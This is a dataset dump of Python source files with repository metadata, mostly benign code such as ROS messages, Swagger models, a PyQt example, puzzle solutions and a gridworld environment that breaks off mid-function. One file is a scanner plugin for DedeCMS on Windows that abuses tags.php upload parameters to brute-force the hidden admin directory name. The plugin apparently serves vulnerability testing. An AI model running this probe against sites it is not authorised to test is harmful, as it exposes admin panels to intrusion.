blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f851895535c8f43ebe64751ebaf22d82378cf452 | 1e0b77feea4aa08f2aa9ff63feddbc818428a350 | /script/dedecms/dedecms_win_find_manage.py | 77efcee0ec9487364ba143234992930c3a5232e7 | [] | no_license | cleanmgr112/Tentacle | 838b915430166429da3fe4ed290bef85d793fae4 | 175e143fc08d1a6884a126b7da019ef126e116fa | refs/heads/master | 2022-12-08T06:36:28.706843 | 2020-08-26T14:06:35 | 2020-08-26T14:06:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,769 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @author: 'orleven'
import itertools
from lib.utils.connect import ClientSession
from lib.core.enums import VUL_LEVEL
from lib.core.enums import VUL_TYPE
from lib.core.enums import SERVICE_PORT_MAP
from script import Script
class POC(Script):
def __init__(self, target=None):
self.service_type = SERVICE_PORT_MAP.WEB
self.name = 'dedecms win manager'
self.keyword = ['dedecms', 'win', 'manager']
self.info = 'Find manager for dedecms'
self.type = VUL_LEVEL.MEDIUM
self.level = VUL_LEVEL.INFO
self.refer = 'https://xz.aliyun.com/t/2064'
Script.__init__(self, target=target, service_type=self.service_type)
async def prove(self):
await self.get_url()
if self.base_url:
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
_data = {
"_FILES[mochazz][tmp_name]": "./{p}<</images/adminico.gif",
"_FILES[mochazz][name]": 0,
"_FILES[mochazz][size]": 0,
"_FILES[mochazz][type]": "image/gif"
}
path_list = list(set([
self.url_normpath(self.base_url, '/'),
self.url_normpath(self.base_url, '../dedecms/'),
self.url_normpath(self.url, 'dedecms/'),
self.url_normpath(self.url, '../dedecms/'),
]))
async with ClientSession() as session:
for path in path_list:
url = path + 'tags.php'
back_dir = ""
flag = 0
async with session.get(url=url) as res:
if res!=None and res.status ==200:
for num in range(1, 7):
if flag ==1 :
break
for pre in itertools.permutations(characters, num):
pre = ''.join(list(pre))
_data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=pre)
async with session.post(url=url, data=_data) as r:
if r!=None:
if r.status == 405:
return
text = await r.text()
if "Upload filetype not allow !" not in text and r.status == 200:
flag = 1
back_dir = pre
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
break
else:
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
flag = 0
x = 0
for i in range(30):
if flag == 1:
x = i
break
for ch in characters:
if ch == characters[-1]:
flag = 1
x = i
break
_data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=back_dir + ch)
async with session.post(url=url, data=_data) as r:
if r!=None:
if r.status == 405:
return
text = await r.text()
if "Upload filetype not allow !" not in text and r.status == 200:
back_dir += ch
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
break
else:
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
if x < 29 and flag ==1:
self.flag = 1
self.req.append({"url": path+ '/'+back_dir})
self.res.append({"info": path+'/'+ back_dir, "key": 'dede_manager'})
| [
"[email protected]"
] | |
fd665f4ee1a672d4be5eb93dc6f5a52a578af62d | cf297c3d66189d2bd9fd8bfdadaeff3ebe6eee05 | /WebBrickLibs/EventHandlers/tests/DummyRouter.py | aeb6ebe6d84716938a3c453ac113956c324b0805 | [
"BSD-3-Clause"
] | permissive | AndyThirtover/wb_gateway | 0cb68a1f2caf7f06942f94b867ea02f4f8695492 | 69f9c870369085f4440033201e2fb263a463a523 | refs/heads/master | 2022-01-19T00:07:20.456346 | 2022-01-05T21:08:16 | 2022-01-05T21:08:16 | 14,687,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,228 | py | # Copyright L.P.Klyne 2013
# Licenced under 3 clause BSD licence
# $Id: DummyRouter.py 2612 2008-08-11 20:08:49Z graham.klyne $
#
# Some test helpers for testing event handlers. Uses a SuperGlobal to save state.
#
import logging
import sys
import unittest
from EventLib.Event import Event, makeEvent
from EventHandlers.BaseHandler import *
# a dummy router to log data
class DummyRouter(object):
def __init__( self ):
self._log = logging.getLogger( "DummyRouter" )
self._subs = list()
self._unsubs = list()
self._pubs = list()
def logMe(self):
# write all stuff to the log
self._log.debug( "logMe" )
def subscribe(self, interval, handler, evtype=None, source=None):
self._subs.append( (interval,handler,evtype,source) )
self._log.debug( "subscribe: %i, %s, %s, %s" % (interval,handler,evtype,source) )
def unsubscribe(self, handler, evtype=None, source=None):
self._unsubs.append( (handler,evtype,source) )
self._log.debug( "unsubscribe: %s, %s, %s" % (handler,evtype,source) )
def publish(self, source, event):
self._pubs.append( (source,event) )
self._log.debug( "publish: %s, %s" % (source,event) )
| [
"[email protected]"
] | |
5c22c50092409f049081caf5752155a483abf51f | 6656c2acc607d269870d04d310e8a35ebbad8d3f | /lib/python2.7/dist-packages/pr2_mechanism_controllers/msg/_Odometer.py | 3a8c8d7ac9f8a3aacb42386f5ce327b54bf4e2bf | [] | no_license | uml-comp4510-5490/install | 97bd8b643773e34f3956e40ac169729a45e34bbe | 2897bf668177aced2e58cac18e86b109716c01df | refs/heads/master | 2020-04-01T05:59:56.541628 | 2018-10-14T01:52:57 | 2018-10-14T01:52:57 | 152,929,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,835 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from pr2_mechanism_controllers/Odometer.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class Odometer(genpy.Message):
_md5sum = "1f1d53743f4592ee455aa3eaf9019457"
_type = "pr2_mechanism_controllers/Odometer"
_has_header = False #flag to mark the presence of a Header object
_full_text = """float64 distance #total distance traveled (meters)
float64 angle #total angle traveled (radians)"""
__slots__ = ['distance','angle']
_slot_types = ['float64','float64']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
distance,angle
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(Odometer, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.distance is None:
self.distance = 0.
if self.angle is None:
self.angle = 0.
else:
self.distance = 0.
self.angle = 0.
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_2d().pack(_x.distance, _x.angle))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
_x = self
start = end
end += 16
(_x.distance, _x.angle,) = _get_struct_2d().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_2d().pack(_x.distance, _x.angle))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
_x = self
start = end
end += 16
(_x.distance, _x.angle,) = _get_struct_2d().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_2d = None
def _get_struct_2d():
global _struct_2d
if _struct_2d is None:
_struct_2d = struct.Struct("<2d")
return _struct_2d
| [
"[email protected]"
] | |
463634d045761a2bc6089838b2810c79f55472c6 | e519a3134e5242eff29a95a05b02f8ae0bfde232 | /services/control-tower/vendor/riffyn-sdk/swagger_client/models/apply_config_body_manual_data.py | aa75dfca4effe3afe375954d8a1513babe352a82 | [] | no_license | zoltuz/lab-automation-playground | ba7bc08f5d4687a6daa64de04c6d9b36ee71bd3e | 7a21f59b30af6922470ee2b20651918605914cfe | refs/heads/master | 2023-01-28T10:21:51.427650 | 2020-12-04T14:13:13 | 2020-12-05T03:27:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,229 | py | # coding: utf-8
"""
Riffyn REST API
### Vocabulary Before you begin, please familiarize yourself with our [Glossary of Terms](https://help.riffyn.com/hc/en-us/articles/360045503694). ### Getting Started If you'd like to play around with the API, there are several free GUI tools that will allow you to send requests and receive responses. We suggest using the free app [Postman](https://www.getpostman.com/). ### Authentication Begin with a call the [authenticate](/#api-Authentication-authenticate) endpoint using [HTTP Basic authentication](https://en.wikipedia.org/wiki/Basic_access_authentication) with your `username` and `password` to retrieve either an API Key or an Access Token. For example: curl -X POST -u '<username>' https://api.app.riffyn.com/v1/auth -v You may then use either the API Key or the accessToken for all future requests to the API. For example: curl -H 'access-token: <ACCESS_TOKEN>' https://api.app.riffyn.com/v1/units -v curl -H 'api-key: <API_KEY>' https://api.app.riffyn.com/v1/units -v The tokens' values will be either in the message returned by the `/authenticate` endpoint or in the createApiKey `/auth/api-key` or CreateAccesToken `/auth/access-token` endpoints. The API Key will remain valid until it is deauthorized by revoking it through the Security Settings in the Riffyn App UI. The API Key is best for running scripts and longer lasting interactions with the API. The Access Token will expire automatically and is best suited to granting applications short term access to the Riffyn API. Make your requests by sending the HTTP header `api-key: $API_KEY`, or `access-token: $ACCESS_TOKEN`. In Postman, add your prefered token to the headers under the Headers tab for any request other than the original request to `/authenticate`. If you are enrolled in MultiFactor Authentication (MFA) the `status` returned by the `/authenticate` endpoint will be `MFA_REQUIRED`. 
A `passCode`, a `stateToken`, and a `factorId` must be passed to the [/verify](/#api-Authentication-verify) endpoint to complete the authentication process and achieve the `SUCCESS` status. MFA must be managed in the Riffyn App UI. ### Paging and Sorting The majority of endpoints that return a list of data support paging and sorting through the use of three properties, `limit`, `offset`, and `sort`. Please see the list of query parameters, displayed below each endpoint's code examples, to see if paging or sorting is supported for that specific endpoint. Certain endpoints return data that's added frequently, like resources. As a result, you may want filter results on either the maximum or minimum creation timestamp. This will prevent rows from shifting their position from the top of the list, as you scroll though subsequent pages of a multi-page response. Before querying for the first page, store the current date-time (in memory, a database, a file...). On subsequent pages you *may* include the `before` query parameter, to limit the results to records created before that date-time. E.g. before loading page one, you store the current date time of `2016-10-31T22:00:00Z` (ISO date format). Later, when generating the URL for page two, you *could* limit the results by including the query parameter `before=1477951200000` (epoch timestamp). ### Postman endpoint examples There is a YAML file with the examples of the request on Riffyn API [Click here](/collection) to get the file. If you don't know how to import the collection file, [here](https://learning.postman.com/docs/postman/collections/data-formats/#importing-postman-data) are the steps. ### Client SDKs You may write your own API client, or you may use one of ours. [Click here](/clients) to select your programming language and download an API client. # noqa: E501
OpenAPI spec version: 1.4.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class ApplyConfigBodyManualData(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'manual_data_id': 'str',
'value': 'str'
}
attribute_map = {
'manual_data_id': 'manualDataId',
'value': 'value'
}
def __init__(self, manual_data_id=None, value=None): # noqa: E501
"""ApplyConfigBodyManualData - a model defined in Swagger""" # noqa: E501
self._manual_data_id = None
self._value = None
self.discriminator = None
if manual_data_id is not None:
self.manual_data_id = manual_data_id
if value is not None:
self.value = value
@property
def manual_data_id(self):
"""Gets the manual_data_id of this ApplyConfigBodyManualData. # noqa: E501
The id of the manual data such as `manual|MDQi5Neznum3gXye3`. # noqa: E501
:return: The manual_data_id of this ApplyConfigBodyManualData. # noqa: E501
:rtype: str
"""
return self._manual_data_id
@manual_data_id.setter
def manual_data_id(self, manual_data_id):
"""Sets the manual_data_id of this ApplyConfigBodyManualData.
The id of the manual data such as `manual|MDQi5Neznum3gXye3`. # noqa: E501
:param manual_data_id: The manual_data_id of this ApplyConfigBodyManualData. # noqa: E501
:type: str
"""
self._manual_data_id = manual_data_id
@property
def value(self):
"""Gets the value of this ApplyConfigBodyManualData. # noqa: E501
The value being set for the manual data. Values will be cast to the valueType of the property they are being written to. Datetimes should be supplied in ISO-8601 format (2019-05-30T15:37:54+00:00). # noqa: E501
:return: The value of this ApplyConfigBodyManualData. # noqa: E501
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this ApplyConfigBodyManualData.
The value being set for the manual data. Values will be cast to the valueType of the property they are being written to. Datetimes should be supplied in ISO-8601 format (2019-05-30T15:37:54+00:00). # noqa: E501
:param value: The value of this ApplyConfigBodyManualData. # noqa: E501
:type: str
"""
self._value = value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ApplyConfigBodyManualData, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApplyConfigBodyManualData):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
61f7e1110562904492dddc8c101dfdb04a9f0b79 | 2009735d19318a3ffe8e56687efb8e7688ebaf5a | /models/final_experiment_scripts/MIMIC/LoS/channel_wise_lstm.py | 672a261444acf134a165a8bd320b316b08fb5d3f | [
"MIT"
] | permissive | weikunzz/TPC-LoS-prediction | 7bb9865e2f0fa3b461cb6fc23ed49996bfba59c1 | 30770f3e75d6a2a725c422b837f7ec864708f5d9 | refs/heads/master | 2023-04-06T10:19:12.284137 | 2021-04-08T14:06:53 | 2021-04-08T14:06:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 834 | py | from eICU_preprocessing.split_train_test import create_folder
from models.run_lstm import BaselineLSTM
from models.initialise_arguments import initialise_lstm_arguments
from models.final_experiment_scripts.best_hyperparameters import best_cw_lstm
if __name__=='__main__':
c = initialise_lstm_arguments()
c['exp_name'] = 'ChannelwiseLSTM'
c['dataset'] = 'MIMIC'
c = best_cw_lstm(c)
log_folder_path = create_folder('models/experiments/final/MIMIC/LoS', c.exp_name)
channelwise_lstm = BaselineLSTM(config=c,
n_epochs=c.n_epochs,
name=c.exp_name,
base_dir=log_folder_path,
explogger_kwargs={'folder_format': '%Y-%m-%d_%H%M%S{run_number}'})
channelwise_lstm.run() | [
"[email protected]"
] | |
0d7102130db2739bb99c1c008e466724c33ed4b7 | 583d03a6337df9f1e28f4ef6208491cf5fb18136 | /dev4qx/messagepush/task/subscribe.py | be4fdbc0be1cdda9998b0a83fc02a876b7637185 | [] | no_license | lescpsn/lescpsn | ece4362a328f009931c9e4980f150d93c4916b32 | ef83523ea1618b7e543553edd480389741e54bc4 | refs/heads/master | 2020-04-03T14:02:06.590299 | 2018-11-01T03:00:17 | 2018-11-01T03:00:17 | 155,309,223 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,146 | py | # -*- coding: utf-8 -*-
import logging
import tornado
from core.subscribe import subscrible_direct
request_log = logging.getLogger("ms.request")
class SubscribeTask(tornado.ioloop.PeriodicCallback):
def __init__(self, application, callback_time):
super(SubscribeTask, self).__init__(self.run, callback_time)
self.application = application
self.master = self.application.sentinel.master_for('madeira')
@tornado.gen.coroutine
def run(self):
# TODO: try
try:
r = self.master
# TODO: return types is empty
types = r.smembers('types')
if types is None:
self.finish('type空')
elif types is not None:
msg_type = r.spop('types')
func = self.application.config['subscrible'].get(msg_type)
request_log.info('GET TASK_MESSAGE %s %s %s', types, msg_type, func)
if func == 'direct':
yield subscrible_direct(self.application, msg_type)
except:
request_log.exception('FAIL')
| [
"[email protected]"
] | |
fbefcb0112cca43cc7b8a399c2dde0d4ca329f56 | 182c651a9b00b9b4d80e6d51ae574cb793958cd6 | /widgets/stylesheet/stylesheet.py | f9c37d6886961ae308ad487c3780ee79e8573ba3 | [] | no_license | eudu/pyqt-examples | c61a7108e1fbfcf2cd918a0f99e9a5a90a3f305c | 8e533b7b3c5e9bbe0617ef1ecb9b169dd216c181 | refs/heads/master | 2020-03-16T01:23:19.573347 | 2018-05-06T20:20:57 | 2018-05-06T20:20:57 | 132,438,940 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,546 | py | #!/usr/bin/python3
#############################################################################
##
## Copyright (C) 2013 Riverbank Computing Limited
## Copyright (C) 2010 Hans-Peter Jansen <[email protected]>.
## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).
## All rights reserved.
##
## This file is part of the examples of PyQt.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor
## the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
## $QT_END_LICENSE$
##
###########################################################################
from PyQt5.QtWidgets import QApplication, QLabel, QMainWindow, QMessageBox
import stylesheet_rc
from ui_mainwindow import Ui_MainWindow
from stylesheeteditor import StyleSheetEditor
class MainWindow(QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.ui.nameLabel.setProperty('class', 'mandatory QLabel')
self.styleSheetEditor = StyleSheetEditor(self)
self.statusBar().addWidget(QLabel("Ready"))
self.ui.exitAction.triggered.connect(QApplication.instance().quit)
self.ui.aboutQtAction.triggered.connect(QApplication.instance().aboutQt)
def on_editStyleAction_triggered(self):
self.styleSheetEditor.show()
self.styleSheetEditor.activateWindow()
def on_aboutAction_triggered(self):
QMessageBox.about(self, "About Style sheet",
"The <b>Style Sheet</b> example shows how widgets can be "
"styled using "
"<a href=\"http://doc.qt.digia.com/4.5/stylesheet.html\">Qt "
"Style Sheets</a>. Click <b>File|Edit Style Sheet</b> to pop "
"up the style editor, and either choose an existing style "
"sheet or design your own.")
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_())
| [
"[email protected]"
] | |
1f77afe28d0cb282cba9d56049db486e0e6d1c6f | d39bf3e0141f39752b40ca420ec7d90204ad4219 | /tests/test_day_02.py | 213be9a1bfceacdaa6696775d1b77d416bee4eb0 | [] | no_license | jasonbrackman/advent_of_code_2017 | 33260d98e1c348b8d249eabe425783568c3db494 | a50e0cf9b628da96cb365744027d1a800557d1c9 | refs/heads/master | 2022-02-18T18:06:58.119383 | 2019-09-12T05:00:02 | 2019-09-12T05:00:02 | 112,784,403 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 957 | py | """
5 1 9 5
7 5 3
2 4 6 8
The first row's largest and smallest values are 9 and 1, and their difference is 8.
The second row's largest and smallest values are 7 and 3, and their difference is 4.
The third row's difference is 6.
In this example, the spreadsheet's checksum would be 8 + 4 + 6 = 18.
What is the checksum for the spreadsheet in your puzzle input?
"""
import pytest
from .. import day_02
@pytest.mark.parametrize('param, expect', [('5 1 9 5', 8),
('7 5 3', 4),
('2 4 6 8', 6)])
def test_min_max_diff(param, expect):
assert day_02.min_max_dif(param) == expect
@pytest.mark.parametrize('param, expect', [('5 9 2 8', 4),
('9 4 7 3', 3),
('3 8 6 5', 2)])
def test_get_divisible_result(param, expect):
assert day_02.get_divisible_result(param) == expect | [
"[email protected]"
] | |
9e8347f3ee2a079d974e2bdbee6c34880736fe6e | d8a9b88f4087ebfe97b462e589071222e2261e47 | /520. Detect Capital.py | 05ac6786a14cb0b3bec7c1c660096e885cf8269c | [] | no_license | rohitpatwa/leetcode | a7a4e8a109ace53a38d613b5f898dd81d4771b1b | f4826763e8f154cac9134d53b154b8299acd39a8 | refs/heads/master | 2021-07-07T12:40:30.424243 | 2021-03-31T00:21:30 | 2021-03-31T00:21:30 | 235,003,084 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | # Check if word is all upper or all lower. elif check if word is one capital and all lower. Else return False.
class Solution:
def detectCapitalUse(self, word: str) -> bool:
if word==word.upper() or word==word.lower():
return True
if word[0] == word[0].upper() and word[1:]==word[1:].lower():
return True
return False | [
"[email protected]"
] | |
871132389561d6b5b48a9d5e7d876bc1654d5ee6 | f2889a13368b59d8b82f7def1a31a6277b6518b7 | /30.py | 75414b4d6be012ed0fdb069967fc9cd91daa06d6 | [] | no_license | htl1126/leetcode | dacde03de5c9c967e527c4c3b29a4547154e11b3 | c33559dc5e0bf6879bb3462ab65a9446a66d19f6 | refs/heads/master | 2023-09-01T14:57:57.302544 | 2023-08-25T15:50:56 | 2023-08-25T15:50:56 | 29,514,867 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,038 | py | # ref: https://discuss.leetcode.com/topic/10665/concise-python-code-using
# -defaultdict
import collections
import copy
class Solution(object):
def findSubstring(self, s, words):
"""
:type s: str
:type words: List[str]
:rtype: List[int]
"""
if not words or not words[0]:
return None
wl, total, strlen, res = (len(words[0]), len(words) * len(words[0]),
len(s), [])
word_ctr = collections.Counter(words)
for i in xrange(wl):
j = i
count = copy.copy(word_ctr)
while j < strlen - wl + 1:
count[s[j:j + wl]] -= 1
while count[s[j:j + wl]] < 0:
count[s[i:i + wl]] += 1
i += wl
j += wl
if j - i == total:
res += i,
return res
if __name__ == '__main__':
sol = Solution()
print sol.findSubstring('barfoothefoobarman', ['foo', 'bar'])
| [
"[email protected]"
] | |
ef8b694de6c2ac6d30f02461ff1ca3cdcf3cd010 | 837377dc4df28263a61ee4af32514b52f3beb976 | /scripts/inverse_reinforcement_learning/envs/gridworld.py | a35a714dc92bf33cb95d8012cb7d6d70b952727c | [] | no_license | aoyan27/reinforcement_learning | 2279a36c1ba0cec1f4e254af71ebb6e6431b5636 | 9170e9e720e0e1a541b586465e01bd89555d27f2 | refs/heads/master | 2021-09-08T01:21:53.630653 | 2018-03-05T03:19:59 | 2018-03-05T03:19:59 | 100,631,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,341 | py | #!/usr/bin.env python
#coding:utf-8
import numpy as np
class Gridworld:
def __init__(self, rows, cols, R_max, noise):
self.rows = rows
self.cols = cols
self.n_state = self.rows * self.cols
self.R_max = R_max
self.noise = noise
self.grid = np.zeros((self.rows, self.cols))
# +----------------> x
# |
# |
# |
# |
# |
# |
# V
# y
self.goal = (self.rows-1, self.cols-1)
self.grid[self.goal] = self.R_max
self.action_list = [0, 1, 2, 3, 4]
self.n_action = len(self.action_list)
self.dirs = {0: '>', 1: '<', 2: 'v', 3: '^', 4: '-'}
self.state_ = None
self.out_of_range_ = None
def state2index(self, state):
# state[0] : y
# state[1] : x
# return state[1] + self.cols * state[0]
return state[0] + self.cols * state[1]
def index2state(self, index):
state = [0, 0]
state[0] = index % self.cols
state[1] = index / self.cols
return state
def get_next_state_and_probs(self, state, action):
transition_probability = 1 - self.noise
probs = np.zeros([self.n_action])
probs[int(action)] = transition_probability
probs += self.noise / self.n_action
# print "probs : "
# print probs
next_state_list = []
for a in xrange(self.n_action):
if state != list(self.goal):
# print "state : ", state
next_state, out_of_range = self.move(state, a)
self.out_of_range_ = out_of_range
# print "next_state() : "
# print next_state
next_state_list.append(next_state)
if out_of_range:
probs[self.n_action-1] += probs[a]
probs[a] = 0
else:
next_state = state
# print "probs[", a, "] : ", probs[a]
if a != self.n_action-1:
probs[self.n_action-1] += probs[a]
probs[a] = 0
next_state_list.append(next_state)
# print "next_state_ : "
# print next_state
# print "next_state_list : "
# print next_state_list
# print "probs_ : "
# print probs
return next_state_list, probs
def get_transition_matrix(self):
P = np.zeros((self.n_state, self.n_state, self.n_action), dtype=np.float32)
for state_index in xrange(self.n_state):
state = self.index2state(state_index)
# print "state : ", state
for action_index in xrange(self.n_action):
action = self.action_list[action_index]
# print "action : ", action
next_state_list, probs = self.get_next_state_and_probs(state, action)
# print "next_state_list : ", next_state_list
# print "probs : ", probs
for i in xrange(len(probs)):
next_state = next_state_list[i]
# print "next_state : ", next_state
next_state_index = self.state2index(next_state)
probability = probs[i]
# print "probability : ", probability
P[state_index, next_state_index, action_index] = probability
# print "P : "
# print P
# print P.shape
return P
def move(self, state, action):
y, x = state
if action == 0:
# right
x = x + 1
elif action == 1:
# left
x = x - 1
elif action == 2:
# down
y = y + 1
elif action == 3:
# up
y = y - 1
else:
# stay
x = x
y = y
out_of_range = False
if x < 0:
x = 0
out_of_range = True
elif x > (self.cols-1):
x = self.cols - 1
out_of_range = True
if y < 0:
y = 0
out_of_range = True
elif y > (self.rows-1):
y = self.rows - 1
out_of_range = True
return [y, x], out_of_range
def show_policy(self, policy, deterministic=True):
vis_policy = np.array([])
if deterministic:
for i in xrange(len(policy)):
vis_policy = np.append(vis_policy, self.dirs[policy[i]])
# print self.dirs[policy[i]]
else:
# for i in xrange(len(policy)):
# # print "np.sum(policy[s]) : ", np.sum(policy[i])
# random_num = np.random.rand()
# # print "random_num : ", random_num
# action_index = 0
# for j in xrange(len(policy[i])):
# random_num -= policy[i][j]
# # print "random_num_ : ", random_num
# if random_num < 0:
# action_index = j
# break
# vis_policy = np.append(vis_policy, self.dirs[action_index])
# # print self.dirs[action_index]
for i in xrange(len(policy)):
vis_policy = np.append(vis_policy, self.dirs[np.argmax(policy[i])])
vis_policy = vis_policy.reshape((self.rows, self.cols)).transpose()
vis_policy[self.goal] = 'G'
print vis_policy
def terminal(self, state):
episode_end = False
if state == list(self.goal):
episode_end = True
return episode_end
def reset(self, start_position=[0,0]):
self.state_ = start_position
return self.state_
def step(self, action, reward_map=None):
next_state_list, probs = self.get_next_state_and_probs(self.state_, action)
# print "next_state_list : ", next_state_list
# print "probs : ", probs
random_num = np.random.rand()
# print "random_num : ", random_num
index = 0
for i in xrange(len(probs)):
random_num -= probs[i]
# print "random_num_ : ", random_num
if random_num < 0:
index = i
break
# print "index : ", index
# print "next_state : ", next_state_list[index]
self.state_ = next_state_list[index]
# self.state_, _ = self.move(self.state_, action)
reward = None
if reward_map is None:
if self.state_ == list(self.goal):
reward = self.R_max
else:
reward = 0
else:
reward = reward_map[self.state2index(self.state_)]
# print "reward : ", reward
episode_end = self.terminal(self.state_)
